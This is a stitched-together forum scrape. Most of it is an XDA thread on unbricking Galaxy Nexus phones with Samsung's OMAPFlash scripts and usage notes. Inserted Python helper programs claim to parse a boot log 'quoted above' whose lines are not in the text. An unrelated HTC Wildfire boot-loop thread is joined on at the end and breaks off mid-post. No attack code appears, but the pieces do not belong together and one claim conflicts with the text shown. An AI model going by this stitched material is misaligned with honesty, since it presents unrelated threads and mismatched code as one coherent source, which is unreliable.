[ 11.756225] omap_hsi omap_hsi.0: __hsi_write_cancel : -61
[ 11.762268] omap_hsi omap_hsi.0: hsi_read_cancel ch 0
[ 11.767791] omap_hsi omap_hsi.0: __hsi_read_cancel : -125
[ 11.773620] omap_hsi omap_hsi.0: __hsi_write_cancel : -61
[ 11.779174] omap_hsi omap_hsi.0: __hsi_read_cancel : -61
[ 11.785552] [MODEM_IF] misc_open : umts_ipc0
[ 11.790954] omap_hsi omap_hsi.0: Entering RX wakeup in 4 wires mode
[ 11.798675] [MODEM_IF] misc_open : umts_rfs0
[ 11.829528] [MODEM_IF] PA EVENT : reset =1, pa=1
[ 11.834228] [MODEM_IF] umts_ipc0 state changed: ONLINE
[ 14.545074] drivers/misc/inv_mpu/mldl_cfg.c|inv_mpu_get_slave_config|1792 returning 4
[ 26.044372] request_suspend_state: wakeup (3->0) at 26030029299 (2012-05-13 00:25:34.359069826 UTC)
[ 26.622772] acc_open
[ 26.625122] acc_release
[ 26.670013]
[ 26.670043] Dongle Host Driver, version 5.90.125.94
[ 26.670043] Compiled in drivers/net/wireless/bcmdhd on Nov 21 2011 at 19:05:54
[ 26.684082] wl_android_wifi_on in
[ 26.687622] wifi_set_power = 1
[ 26.971282] =========== WLAN going back to live ========
[ 26.977600] sdio_reset_comm():
[ 27.066314] dhdsdio_write_vars: Download, Upload and compare of NVRAM succeeded.
[ 27.228179] wifi_get_mac_addr
[ 27.232513] Firmware up: op_mode=1, Broadcom Dongle Host Driver mac=a0:0b:ba:e6:73:ae
[ 27.344390] dhd_rx_frame: net device is NOT registered yet. drop packet
[ 27.351531] dhd_rx_frame: net device is NOT registered yet. drop packet
[ 27.360076] Firmware version = wl0: Oct 5 2011 14:41:12 version 5.90.125.94
[ 28.639709] wl_bss_connect_done succeeded status=(0x9)
[ 28.732391] wl_bss_connect_done succeeded status=(0x11)
[ 29.166564] nfc_power_apply ON
[ 29.201965] nfc_power_apply OFF
[ 29.272308] nfc_power_apply ON
[ 35.672241] rpmsg_omx rpmsg-omx1: local addr assigned: 0x401
[ 35.682067] omap-iommu omap-iommu.0: iommu_get: ducati qos_request
[ 35.703735] omap_hwmod: ipu: failed to hardreset
[ 35.713470] omap-iommu omap-iommu.0: ducati: version 2.1
[ 35.826934] rpmsg_omx rpmsg6: conn rsp: status 0 addr 101
[ 35.975158] rpmsg_omx rpmsg-omx1: Disconnecting from OMX service at 101
[ 39.279998] wlan0: no IPv6 routers present
[ 44.895355] init: untracked pid 1113 exited
[ 44.905731] init: untracked pid 1119 exited
[ 44.918914] init: untracked pid 1123 exited
[ 44.923248] init: untracked pid 1124 exited
[ 44.927612] init: untracked pid 1117 exited
[ 44.932067] init: untracked pid 1120 exited
[ 54.283905] max17040 4-0036: online = 1 vcell = 3788750 soc = 48 status = 3 health = 1 temp = 350 charger status = 0
[ 61.938812] request_suspend_state: sleep (0->3) at 61924468996 (2012-05-13 00:26:10.253540041 UTC)
[ 61.959869] dhd_set_suspend: force extra Suspend setting
First, the device checks if it's too hot or too cold to boot via IROM software (internal read-only memory). After that it begins initialization. The IROM version is displayed. Then the device type.
The OMAP processor in the Galaxy Nexus is an HS (High Security) processor, as opposed to a GP (General Purpose) processor. This means the first bootloader (AKA MLO or X-Loader) is a signed binary which is e-fused to the device.
I've seen in the past on similar Hummingbird processors that only the first 1K is checked for speed because hashing it takes a little bit of time. This may or may not be the case with this particular device. We will see.
Anyway, there's a possibility we can find an MLO which is already presigned somewhere on the Internet. We need whatever they use at Samsung which provides the initial firmware load to a device without any firmware on it.
Here is a relevant page: http://omapedia.org/wiki/Bootloader_Project
Code:
If you are using an HS (High Security) OMAP device, an extra step is required. First, build x-load.bin using the steps above. Then, download the MShield signing tool and use the commands below. Contact your TI representative to get access to this tool.
In order to get the firmware onto the device in the first place, this bootloader must exist. We need a copy of it. Once we have this bootloader, we can revive Galaxy Nexus devices.
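An added example, not part of the original post: a small Python parser that reads a UART capture like the one above and reports the furthest boot stage reached, plus the device type, X-Loader banner and reset status the post walks through. Treating the `sbl_board_` lines as stage 3 output is an assumption based on the function names in the log; the truncated capture is constructed by cutting the excerpt short.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Boot stages in the order the post lists them.
STAGES = ("none", "irom", "xloader", "sbl", "kernel")

# One marker per stage. Attributing "sbl_board_" lines to the SBL is an
# assumption based on the function names printed in the capture.
STAGE_MARKERS = (
    ("irom", re.compile(r"^\[Thermal\]|PPA release")),
    ("xloader", re.compile(r"X-Loader \d")),
    ("sbl", re.compile(r"sbl_board_")),
    ("kernel", re.compile(r"^\[\s*\d+\.\d{6}\]")),
)

DEVICE_RE = re.compile(r"Device type:\s*(\w+),\s*DEBUG\s+(\w+)")
PPA_RE = re.compile(r"PPA release ([\d.]+)")
XLOADER_RE = re.compile(r"X-Loader ([\d.]+) \(([^)]*)\)")
RSTST_RE = re.compile(r"PRM_RSTST\s*[:=]\s*(?:0x)?([0-9A-Fa-f]+)")

# Excerpt of the capture quoted in the post above (one boot, lines shortened).
SAMPLE_LOG = """\
[Thermal] OK to boot
-- OMAP 00004460 (version 04460e11) PPA release 1.6.1 Hash 30639809--
Device type: HS, DEBUG OFF
-- PROD PPA RC3.2.3 --
Reset reason = 00037ba2
PRM_RSTST = 00000002
Texas Instruments X-Loader 1.41 (Nov 16 2011 - 16:28:45)
Starting OS Bootloader from MMC/SD1 ...
CFG_LOADADDR = 0xa0208000
[ omap_usbacc_get_reboot_reason :333] nJigStatus = 0x00000003
[ __sbl_board_hw_init_late :730] Wake up by TA / USB / JIG
<hit enter twice to activate fiq debugger>
[ 4.163116] fsa9480 4-0025: cable detect change, from 'unknown/none' to 'uart'
[ 4.180816] Freeing init memory: 276K
"""

# Constructed: the same excerpt cut off before the SBL prints anything,
# standing in for a device that stops at stage 2.
TRUNCATED_LOG = SAMPLE_LOG.split("CFG_LOADADDR")[0]


@dataclass
class BootSummary:
    furthest_stage: str = "none"
    boots: int = 0                      # number of PPA banners seen
    device_type: Optional[str] = None   # "HS" or "GP"
    debug: Optional[str] = None         # "ON" or "OFF"
    ppa_release: Optional[str] = None
    xloader_version: Optional[str] = None
    xloader_build: Optional[str] = None
    prm_rstst: list = field(default_factory=list)
    fiq_prompt: bool = False


def summarize(log: str) -> BootSummary:
    """Extract boot-stage progress and identity fields from a UART capture."""
    s = BootSummary()
    reached = 0
    for raw in log.splitlines():
        line = raw.strip()
        if not line:
            continue
        for name, marker in STAGE_MARKERS:
            if marker.search(line):
                reached = max(reached, STAGES.index(name))
        if (m := PPA_RE.search(line)):
            s.ppa_release = m.group(1)
            s.boots += 1
        if (m := DEVICE_RE.search(line)):
            s.device_type, s.debug = m.group(1), m.group(2)
        if (m := XLOADER_RE.search(line)):
            s.xloader_version, s.xloader_build = m.group(1), m.group(2)
        if (m := RSTST_RE.search(line)):
            s.prm_rstst.append(int(m.group(1), 16))
        if "activate fiq debugger" in line:
            s.fiq_prompt = True
    s.furthest_stage = STAGES[reached]
    return s


def report(s: BootSummary) -> list:
    """Turn a summary into short notes for a bench log."""
    notes = [f"furthest stage reached: {s.furthest_stage}"]
    if s.furthest_stage != "kernel":
        notes.append(f"no kernel output: boot stopped at or after {s.furthest_stage}")
    if s.device_type:
        notes.append(f"device type {s.device_type}, DEBUG {s.debug}")
    if s.fiq_prompt:
        notes.append("FIQ debugger prompt is offered on the UART")
    return notes


if __name__ == "__main__":
    for label, text in (("full", SAMPLE_LOG), ("truncated", TRUNCATED_LOG)):
        print(label, report(summarize(text)))
```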
You may have seen this already, but just in case - this seems to be a bootloader of some kind. I couldn't get it to work with my bricked SGN, but it may be of some use to the unbricking effort.
Can't post link, so search for "Unbrick dead Samsung GT-i9250 Galaxy Nexus 32GB".
Best of luck!
The user above is referring to this link, I think:
http://forum.xda-developers.com/showthread.php?t=1640443
The user there shares a .zip file that supposedly is able to unbrick a 32GB GNex using some Samsung software. It calls OMAPFlash.exe with a bunch of parameters. I don't know whether it will be useful or not, but it's a start.
The batch file that the post above ^ asks the users to run is this:
Code:
::::
:: Copyright (C) 2010-2011, Samsung Electronics, Co., Ltd. All Rights Reserved.
:: Written by System S/W Group, S/W Platform R&D Team,
:: Mobile Communication Division.
::::
::::
:: Project Name : Proxima GED
::
:: Project Description :
::
:: Comments : tabstop = 8, shiftwidth = 8, noexpandtab
::::
::::
:: File Name : omap4460_tuna_hs.bat
::
:: File Description :
::
:: Author : System Platform 2
:: Dept : System S/W Group (S/W Platform R&D Team)
:: Created : 17/Aug/2011
:: Version : Baby-Raccoon
::::
:__loop
@OMAPFlash.exe -v @Targets\Projects\tuna\omap4460_tuna_hs_pro.txt
@PAUSE
GOTO __loop
Seeing the text file path, I went and looked. Here's what I found:
Code:
##
# Copyright (C) 2010-2011, Samsung Electronics, Co., Ltd. All Rights Reserved.
# Written by System S/W Group, S/W Platform R&D Team,
# Mobile Communication Division.
##
##
# Project Name : Proxima GED
#
# Project Description :
#
# Comments : tabstop = 8, shiftwidth = 8, noexpandtab
##
##
# File Name : omap4460_tuna_hs.txt
#
# File Description :
#
# Author : System Platform 2
# Dept : System S/W Group (S/W Platform R&D Team)
# Created : 17/Aug/2011
# Version : Baby-Raccoon
##
-omap 4
-t 36000 -p OMAP4460_TUNA_8G_HS_PRO -2
#chip_download [email protected] Targets\Projects\tuna\MBR.bin
chip_download [email protected] Targets\Projects\tuna\MLO_4460_HS_PRO
chip_download [email protected] Targets\Projects\tuna\sbl.img
command cold_sw_reset
So it appears that the software writes the files MLO_4460_HS_PRO and sbl.img to different parts of the internal memory.
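An added example, not part of the original post or of the Samsung package: a Python parser for scripts in this layout, following the option and `chip_download` / `chip_erase` syntax from the OMAPFlash usage text quoted in this thread, so the writes a downloaded script would perform can be listed before it is run. The device name MEMDEV, the offsets and both sample scripts are constructed placeholders; the 40000h block size is the example figure from the usage text.

```python
from dataclasses import dataclass, field

VALUE_OPTIONS = {"-omap", "-t", "-p", "-com"}   # options that take one value
FLAG_OPTIONS = {"-2", "-v"}                     # options without a value

# Constructed sample in the layout of the script quoted above. MEMDEV and the
# offsets are placeholders, not values taken from the Samsung package.
SAMPLE_SCRIPT = r"""
# File Name : example.txt
-omap 4
-t 36000 -p OMAP4460_TUNA_8G_HS_PRO -2
#chip_download MEMDEV@0 Targets\Projects\tuna\MBR.bin
chip_download MEMDEV@20000 Targets\Projects\tuna\MLO_4460_HS_PRO
chip_download MEMDEV@40000 Targets\Projects\tuna\sbl.img
command cold_sw_reset
"""

# Constructed script containing the mistakes the usage text warns about.
RISKY_SCRIPT = """
-2
chip_erase MEMDEV@30000 0
"""


@dataclass
class FlashOp:
    action: str    # "download" or "erase"
    device: str
    offset: int    # hexadecimal in the script; 0 when "@offset" is absent
    argument: str  # file path for download, size (hex text) for erase


@dataclass
class Script:
    options: dict = field(default_factory=dict)
    ops: list = field(default_factory=list)
    commands: list = field(default_factory=list)
    unknown: list = field(default_factory=list)   # (line number, text)


def _parse_options(words, options):
    i = 0
    while i < len(words):
        if words[i] in VALUE_OPTIONS and i + 1 < len(words):
            options[words[i]] = words[i + 1]
            i += 2
        elif words[i] in FLAG_OPTIONS:
            options[words[i]] = True
            i += 1
        else:
            raise ValueError(f"unknown option {words[i]}")


def parse_script(text: str) -> Script:
    script = Script()
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank line or comment (a commented-out step is skipped)
        words = line.split()
        head = words[0]
        try:
            if head.startswith("-"):
                _parse_options(words, script.options)
            elif head in ("chip_download", "chip_erase") and len(words) >= 3:
                device, _, off = words[1].partition("@")
                action = head.split("_", 1)[1]
                if action == "erase":
                    int(words[2], 16)  # size must be a hexadecimal number
                offset = int(off, 16) if off else 0
                script.ops.append(
                    FlashOp(action, device, offset, " ".join(words[2:])))
            elif head == "command" and len(words) > 1:
                script.commands.append(" ".join(words[1:]))
            else:
                raise ValueError("unrecognised line")
        except ValueError:
            script.unknown.append((lineno, line))
    return script


def review(script: Script, block_size: int) -> list:
    """Check a parsed script against the rules stated in the usage text."""
    notes = []
    if "-p" not in script.options:
        notes.append("no -p <platform>: the usage text lists it as required")
    if script.options.get("-2") and "-omap" not in script.options:
        notes.append("-2 without -omap: peripheral boot needs the OMAP generation")
    for op in script.ops:
        if op.action != "erase":
            continue
        if op.offset % block_size:
            notes.append(f"erase offset {op.offset:#x} is not a multiple "
                         f"of block size {block_size:#x}")
        if int(op.argument, 16) == 0:
            notes.append(f"erase size 0 on {op.device}: erases from "
                         f"{op.offset:#x} to the end of the device")
    for lineno, line in script.unknown:
        notes.append(f"line {lineno} not understood: {line}")
    return notes


if __name__ == "__main__":
    parsed = parse_script(SAMPLE_SCRIPT)
    for op in parsed.ops:
        print(f"{op.action:8} {op.device} @ {op.offset:#x}  {op.argument}")
    print(review(parse_script(RISKY_SCRIPT), 0x40000))
```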
Any success for the device driver? In the documents above, they say you should use the FTDI VCP (Virtual COM Port) drivers... But included in the package above, there is a driver in the ../usb_drv_windows directory, for exactly the TI driver you mentioned:
Code:
%USB_OMAP4460% = USB_Install, USB\VID_0451&PID_d010
For lazy reference:
Code:
[SIZE=2]-- Usage --
OMAPFlash Host is a command-line based application. It is currently available
for Windows XP only and will run in a Windows command shell. The application can
take commands directly from the command line or via a script file (a more useful
approach). The syntax for calling the tool is:
omapflash [ <option> ] <command>
or, if a script file is used: omapflash @<file>
-- Options --
The tool has a number of options that can be used to control its overall
behavior.
-com <port number> By default OMAPFlash will try to communicate with the
target platform using a USB serial link. This option will force OMAPFlash to
use a UART for serial communication and specify the host side COM-port to use.
-t <timeout> By default the timeout for communication on the serial link is 5
seconds. This option allows control of the timeout value by specifying another
timeout value in seconds.
-p <platform> This option is required by OMAPFlash and specifies the platform
for which the download is to take place. The platform specified is a name tag
that allows OMAPFlash to identify the correct second loader to use. The tag
typically identifies the platform type and the memory used with the OMAP
device present on the platform (“e.g. SDP_MDDR_HYNIX_4G). The tag is used to
look up the second loader in a configuration file (omapflash2nd.txt) in
combination with an OMAP device identifier received from the platform during
peripheral boot.
-omap <version> This option is required by OMAPFlash if a peripheral boot
sequence is used to transfer a second loader to a target platform. The option
specifies the OMAP generation used on the platform – without this option set,
OMAPFlash will be unable to determine how to correctly perform the peripheral
boot sequence necessary for transfer of the second loader to the platform. The
version number is a single digit integer (e.g. ‘3’ for an OMAP3xxx based
platform or ‘4’ for an OMAP4xxx based platform).
-2 This option controls whether OMAPFlash will try to use the ROM code
peripheral boot sequence to transfer a second loader to internal RAM before
doing anything else. This option will be required for most scenarios where
OMAPFlash is used but can be left out if OMAPFlash Host is interacting with a
second loader already running on a target platform.
-v The ‘-v’ option controls whether OMAPFlash Host will run in verbose mode.
If set, more information will be shown during the execution of the flashing
sequence. Note that this option should be set in order to see the target
platform response to certain commands (e.g. ‘chips’).
-- Commands --
Commands are executed on the target platform. Any command is prefixed by the
keyword ‘command’ and anything following this keyword will be passed directly to
OMAPFlash Second by OMAPFlash Host without interpretation or modification.
Typically the ‘verbose’ option should be used with commands in order to ensure
that information returned from the platform will be shown on the console.
branch <device> <offset>
This command will cause OMAPFlash Second to make an
unconditional branch to a memory mapped address. The device will typically be
the SDRAM handled by the OMAP SDRAM controller in this case, and the offset
typically zero. The device ID must be one known by OMAPFlash Second and the
offset an integer within the address offset range valid for the device.
peek32 <address>
Get the register value of the register with the given address.
poke32 <address> <value>
Modify the register at the given address to the given value.
peekpoke32 <address> <value> <mask>
Modify the register at the given address with the given value and mask.
-- Flashing --
OMAPFlash Host is able to handle three basic procedures for accessing memory
devices through the OMAPFlash Second loader. These procedures are used to erase
memory devices, transfer a binary file to a device or upload the device content
to a binary file. In all cases, parameter values specifying sizes or offsets are
hexadecimal.
[B]chip_erase <device>[@offset] <size> [/B]
This procedure is used to erase the
content of a device, either for the whole device or for part of its address
range. The ‘device’ identifier is a string matching one of the devices
available on the platform as listed from the ‘chips’ command – in other words,
a device known to OMAPFlash Second for the particular platform used (SDRAM is
not a valid choice). If an ‘offset’ is used, the device erasure will start at
the offset specified. The offset will need to be compatible with the memory
structure of the device in question – e.g. if the device has a block size of
40000h bytes, the offset will need to be a multiple of the block size. The
‘size’ specifies the number of bytes to erase – a value of zero has the
special meaning of “to the end of the device”, either starting at offset zero
or at the specified ‘offset’ value, and can be used to erase the entire
device. Note that the typical erase functionality of a memory device is based
on the erasure of blocks of memory – it may not make sense to ask for erasure
of a size that is not a multiple of the block size of the device.
[B]chip_download <device>[@offset] <file> [/B]
In order to transfer a binary file to a
device on the platform this procedure is used. The ‘device’ identifier is a
string matching one of the devices available on the platform. If an ‘offset’
is specified the binary will be downloaded to the device starting at the
offset address specified. Using an offset should be done with some caution,
since the meaning of the offset value may be unclear for some device types
(e.g. for a NAND device the offset will be used without consideration of bad
blocks present in the memory space preceding the offset address). The file to
be downloaded is specified by the ‘file’ parameter and must be a raw image.
[B]chip_upload <device>[@offset] <size> <file> [/B]
In order to upload the content of
a memory device this procedure is used. The ‘device’ identifier is a string
matching one of the devices available on the platform. If an ‘offset’ is
specified content will be uploaded from the device starting at the offset
address specified. As for the ‘chip_download’ procedure the use of an offset
should be done with caution. The ‘size’ parameter specifies the number of
bytes to upload and the ‘file’ parameter the file to which the uploaded data
will be saved. Note that due to some limitations on the serial link, upload of
data will be considerably slower than download.
[/SIZE]
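A pre-flight check for the three flashing procedures described above, written as an added example that is not part of the original post or of OMAPFlash itself: it parses `<device>[@offset]`, reads sizes and offsets as hexadecimal, and applies the block-size, zero-size and NAND-offset rules from the text. The device table, the file names and the `check`/`Plan` names are assumptions for illustration; real device names and sizes come from the ‘chips’ listing on the target.

```python
"""Pre-flight check for OMAPFlash flashing procedure arguments (added example)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed device table: name -> (kind, size in bytes, erase block size in bytes).
# On a real platform these come from the 'chips' listing; the names and values
# here are assumptions, with the NAND block size set to the 40000h used in the text.
DEVICES = {
    "NAND": ("nand", 0x10000000, 0x40000),
    "EMMC": ("mmc", 0x40000000, 0x200),
}

# Number of arguments that follow <device>[@offset] for each procedure.
ARITY = {"chip_erase": 1, "chip_download": 1, "chip_upload": 2}
TARGET = re.compile(r"^(\w+)(?:@([0-9A-Fa-f]+))?$")


class ArgumentError(ValueError):
    """The argument list contradicts the documented rules."""


@dataclass
class Plan:
    procedure: str
    device: str
    offset: int
    size: Optional[int] = None      # bytes touched on the device (None for download)
    file: Optional[str] = None
    warnings: list = field(default_factory=list)


def parse_hex(text, what):
    """Sizes and offsets are hexadecimal; this checker accepts bare hex digits only."""
    if not re.fullmatch(r"[0-9A-Fa-f]+", text):
        raise ArgumentError(f"{what} {text!r} is not a hexadecimal number")
    return int(text, 16)


def check(line, devices=DEVICES):
    """Validate one flashing procedure line and return the resolved Plan."""
    words = line.split()
    if not words or words[0] not in ARITY:
        raise ArgumentError(f"not a flashing procedure: {line!r}")
    proc = words[0]
    if len(words) != 2 + ARITY[proc]:
        raise ArgumentError(f"{proc}: wrong number of arguments")
    match = TARGET.match(words[1])
    if not match:
        raise ArgumentError(f"bad <device>[@offset]: {words[1]!r}")
    device = match.group(1)
    if proc == "chip_erase" and device.upper() == "SDRAM":
        raise ArgumentError("SDRAM is not a valid device for chip_erase")
    if device not in devices:
        raise ArgumentError(f"{device!r} is not a device known for this platform")
    kind, dev_size, block = devices[device]
    offset = int(match.group(2), 16) if match.group(2) else 0
    if offset >= dev_size:
        raise ArgumentError(f"offset {offset:X}h is past the end of {device}")
    plan = Plan(proc, device, offset)

    if proc == "chip_download":
        plan.file = words[2]
    else:
        size = parse_hex(words[2], "size")
        if size == 0 and proc == "chip_erase":
            size = dev_size - offset        # zero means "to the end of the device"
        elif size == 0:
            plan.warnings.append("size 0 has a documented meaning only for chip_erase")
        if offset + size > dev_size:
            raise ArgumentError(f"{offset:X}h + {size:X}h runs past the end of {device}")
        plan.size = size
        if proc == "chip_upload":
            plan.file = words[3]

    if proc == "chip_erase":
        if offset % block:
            raise ArgumentError(f"offset {offset:X}h is not a multiple of block size {block:X}h")
        if plan.size % block:
            plan.warnings.append(f"size {plan.size:X}h is not a multiple of block size {block:X}h")
    elif offset and kind == "nand":
        plan.warnings.append("NAND offset is applied without regard to bad blocks before it")
    return plan


if __name__ == "__main__":
    # Constructed command lines; boot.img and dump.bin are placeholder file names.
    for cmd in ("chip_erase NAND 0", "chip_erase NAND@80000 40000",
                "chip_erase NAND@40000 1000", "chip_erase NAND@1000 40000",
                "chip_download NAND@40000 boot.img", "chip_upload EMMC 200 dump.bin"):
        try:
            print(cmd, "->", check(cmd))
        except ArgumentError as err:
            print(cmd, "-> rejected:", err)
```

Note that `40000` on the command line is 262144 bytes, not forty thousand, because every size and offset is read as hexadecimal.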
First things first. I received a PM from user itsalllgood with information regarding this topic. Here's the whole PM, copied and pasted:
itsalllgood said:
Dear fred,
Sorry to bother you... I wanted to post here but I am not allowed.. I am a computer engineer from Montreal currently living abroad.. I had a gnex that died and did a lot of work to try to get it back.. to sum it all up, the omapidia project add TI site will get the full picture. The tool you linked is based on TI 1.6 omap flash.. I will keep it short... the link below will sum up my work and please copy and paste it if you think it's worth it.. thanks in advance..
http://forum.xda-developers.com/showthread.php?p=26334564&posted=1#post26334564
^^ Somehow your link got messed up, but I think it's this one.
Is it possible to hardware prevent a device like Samsung Galaxy S2 to go fastboot / odin mode when powering on but still be able to load the operating system?
Because even though I have a password set on the device, if it is stolen anyone can connect it to fastboot with power+voldown+menu and restore it to defaults. For example, filling that corresponding partition with zeros will prevent entering odin mode unless you boot into the operating system and restore the partition with dd.
First of all, that's off-topic. But I'll provide a speculative answer nonetheless.
I would think that you would be able to prevent a device from reaching recovery/fastboot/odin-download-mode, but it would have a big disadvantage, which is that if you are not able to boot into the OS somehow, you would have an unusable device. Although a device like the Galaxy Nexus, if stolen, could have its data retrieved by potentially using Odin and/or fastboot to reset the password, removing these failsafes would mean that you have a higher chance of bricking. Besides, that's what remote wipe apps (and other stolen-phone tools) are for. Check out Avast! if you don't have an antivirus/stolen-phone toolkit.
I'm by no means an expert here, but that's just my two cents.
EDIT: By the way, could we have someone (like AdamOutler) look at what we've got in this thread so far to see if the MLO file that we found is what's needed (as mentioned by Adam in the first couple posts)?
It's just that I know neither the exact boot sequence of the SGS2 GT-I9100 nor the partitions' interdependence (for example, say that the boot partition needs the recovery or the sbl: I couldn't zero that partition because it is a dependence).
What I would like to know is if this is possible:
- Backup all partitions.
- Zero, from android with dd, all partitions that allow anyone to enter odin/fastboot/clockworkmod/recovery so, if I lose the device, no one can make an odin backup or reset my device, unless you restore the partitions from android or you use a hardware JTAG.
- Even with the previous done, the phone must be able to boot normally into the operating system.
I have a gut feeling that that's not possible. For recovery/odin modes, it may be possible due to them not really being directly involved in the boot process. However, for fastboot, I think it's part of the bootloader itself and therefore cannot be disabled using simple commands without also disabling the phone's booting process. For example, if you have the proper drivers installed on your computer, a Galaxy Nexus that's booting into Android will show up as the same device as if you're connected via Fastboot. Unless someone can alter the source and recompile a bootloader with disabled fastboot, I don't think what you stated above is completely possible.
FredFS456 said:
I have a gut feeling that that's not possible. For recovery/odin modes, it may be possible due to them not really being directly involved in the boot process. However, for fastboot, I think it's part of the bootloader itself and therefore cannot be disabled using simple commands without also disabling the phone's booting process. For example, if you have the proper drivers installed on your computer, a Galaxy Nexus that's booting into Android will show up as the same device as if you're connected via Fastboot. Unless someone can alter the source and recompile a bootloader with disabled fastboot, I don't think what you stated above is completely possible.
I think what I need could be done with a locked bootloader. As far as I know, the Samsung Galaxy S2 comes with an unlocked bootloader (causing the security flaw) while others like the Samsung Galaxy Nexus come with a locked one: that means on stock devices, with a pattern or password in use and USB debugging disabled, there is no way someone can access your data even if no encryption is set.
Can anyone clarify things on this?
Bump, and back on topic.
Any developments here?
Yes. http://forum.xda-developers.com/showthread.php?t=1640443
it's done.
AdamOutler said:
Yes. http://forum.xda-developers.com/showthread.php?t=1640443
it's done.
Does anyone know HOW it's done??
EDIT: Actually the accompanying documentation explains quite well!
@Adam: Do you think we could tweak these drivers etc. for other devices not using OMAP?
(It seems that many protocols are standard, including the serial (UART) over USB FTDI-drivers...)
E:V:A said:
Does anyone know HOW it's done??
EDIT: Actually the accompanying documentation explains quite well!
@Adam: Do you think we could tweak these drivers etc. for other devices not using OMAP?
(It seems that many protocols are standard, including the serial (UART) over USB FTDI-drivers...)
It works just like UBM... but stock.
No. I don't think we can do that. It's an omap tool that requires bootmodes to be proper to work on omap. It can be applied to other properly configured omap devices.
EDIT : The issue has been resolved.
----------------------------------------------------
Hi guys, sorry for starting a new thread. I've been searching the XDA forum and Googling for the solution for 3 days but haven’t found one. I am facing a very weird and annoying problem and am in desperate need of help.
My Wildfire was working fine on CM 7.2 Stable. A few days back I performed the following things:
1) To resolve the wireless related issues I reflashed Radio (3.35.20.10)
2) Flashed latest Kernel (SympKernV4.5) to give it a try, was not satisfied and reflashed the previous Kernel (SympKernV4.1)
After that my phone got stuck on the CM boot screen.
I have tried the following things:
1) Wiped everything and took nandroid backup without any problem. Everything went well but at the end same boot screen. Yes, I have got two partitions in SDCard, FAT32 and ext3. And obviously I used the same version of CWM to restore as I did when creating the backup.
2) Tried the same things 3-4 times to no avail.
3) Ran RUU (RUU_Buzz_HTC_WWE_1.25.405.1_Radio_13.45.55.24_3.35.15.31_release_142189_signed). Downgraded and rooted using unrevoked once again. It was booting fine. Flashed recovery 5.0.2.8. Took nandroid backup, everything went perfectly without any error, but when I did the reboot, same CM boot screen.
4) Flashed RemPuzzle_2.81-full and the boot was fine. But again when I tried to restore nandroid backup, got stuck on the same boot screen. I have waited for 5 hours.
5) Tried some other RUUs but the result is still the same. Phone boots perfectly when I flash the RUU. After downgrading and rooting, when I try to restore the nandroid backup, it works fine till the end without any error, but when I reboot the system it gets stuck on the boot screen.
6) Followed what eventcom has mentioned in http://forum.xda-developers.com/showthread.php?t=1401784&page=2 . Booting was okay but again stuck on boot screen after nandroid restore.
7) Went back to CWM 2.5.0.7 and reflashed the CWM 5.0.2.8.
8) Removed SDCard and SIM before reboot.
9) Don’t think the problem is related to MTD partition as I have formatted all the 3 partitions (/cache, /data and /system).
10) I don’t think the Nandroid Backup has got corrupted coz Nandroid Restore was successful 4 days back before that Radio and Kernel thing; moreover I have the backup file saved on PC and I copy the file to SDCard before every new Nandroid restore operation.
Any clues?
Your help will be much appreciated. Thanks for your time.
Regards
Anybody ?
Hi pal, sorry for my delayed response. Xmas is nuts here :/ ok what I would like you to try is a clean install of cm7 stable and once that's installed go to the play store. The app I want you to get is called nandroid manager, install it and allow it to check your back up. I want to see if it will restore from it or if it will find it corrupt. All going well it will restore your apps and data and we can go from there
Sent from my HTC Sensation XE with Beats Audio Z715e using Tapatalk
heavy_metal_man said:
The app I want you to get is called nandroid manager, install it and allow it to check your back up. I want to see if it will restore from it or if it will find it corrupt. All going well it will restore your apps and data and we can go from there
Sent from my HTC Sensation XE with Beats Audio Z715e using Tapatalk
Hi mate, thanks for your reply. I really appreciate it. There are some things I need to ask.
1. Right now I am on CWM 2.5.0.1, so before restoring the backup taken by CWM 5.0.2.8 I will have to flash CWM 5.0.2.8 first. Right?
2. AFAIK, Nandroid Backup is stored in the "backup" folder
Code:
clockworkmod\backup
Right ?
There is another folder "download"
Code:
clockworkmod\download
and two files
Code:
.nomedia
and
Code:
.settings
inside "clockworkmod" folder.
What is the role of the "download" folder and those two files? Do they have anything to do with the nandroid backup? If I want to restore any nandroid backup, do I also need to move that "download" folder and those two files to the "clockworkmod" folder, or will only moving the backup inside the "backup" folder do the job?
optimusodd said:
Hi mate, thanks for your reply. I really appreciate it. There are some things I need to ask.
1. Right now I am on CWM 2.5.0.1, so before restoring the backup taken by CWM 5.0.2.8 I will have to flash CWM 5.0.2.8 first. Right?
2. AFAIK, Nandroid Backup is stored in the "backup" folder
Code:
clockworkmod\backup
Right ?
There is another folder "download"
Code:
clockworkmod\download
and two files
Code:
.nomedia
and
Code:
.settings
inside "clockworkmod" folder.
What is the role of the "download" folder and those two files? Do they have anything to do with the nandroid backup? If I want to restore any nandroid backup, do I also need to move that "download" folder and those two files to the "clockworkmod" folder, or will only moving the backup inside the "backup" folder do the job?
If you made the back up with cwm 5 you will need cwm 5, pal. The difference between those two recoveries is a scripting change, going from amend to edify I believe. So you need version 5 if that's what the back up was made with.
Second, your back ups are indeed within the cwm/backup folder. The other folder is for if you use the Rom manager application (which is made by the same gentleman who makes and maintains cwm recovery). The setting file tells the app your default app settings and preferences, and the .nomedia is a dummy file. When android apps like music players and picture viewers etc. scan the sdcard for content they also look for the .nomedia file, which tells the app simply that there is no media in the folder and that it does not need to scan it. Should you want to make one, simply create a .txt file and rename it to .nomedia and android apps will ignore the folder when looking for media.
So should you want to back up your backups as it were simply copy the whole backup folder from your sd card to your pc, job done
Sent from my HTC Sensation XE with Beats Audio Z715e using Tapatalk
heavy_metal_man said:
The other folder is for if you use the Rom manager application (which is made by the same gentleman who makes and maintains cwm recovery). The setting file tells the app your default app settings and preferences, and the .nomedia is a dummy file. When android apps like music players and picture viewers etc. scan the sdcard for content they also look for the .nomedia file, which tells the app simply that there is no media in the folder and that it does not need to scan it. Should you want to make one, simply create a .txt file and rename it to .nomedia and android apps will ignore the folder when looking for media.
Ah okay, thanks for the explanation.
Okay, I used nandroid manager to restore the backup and everything went well till the end. No error. Nothing. After the completion it rebooted the device and it again got stuck on the bootscreen. It has been stuck on the bootscreen for the last 20 minutes. I don't understand why
optimusodd said:
Ah okay, thanks for the explanation.
Okay, I used nandroid manager to restore the backup and everything went well till the end. No error. Nothing. After the completion it rebooted the device and it again got stuck on the bootscreen. It has been stuck on the bootscreen for the last 20 minutes. I don't understand why
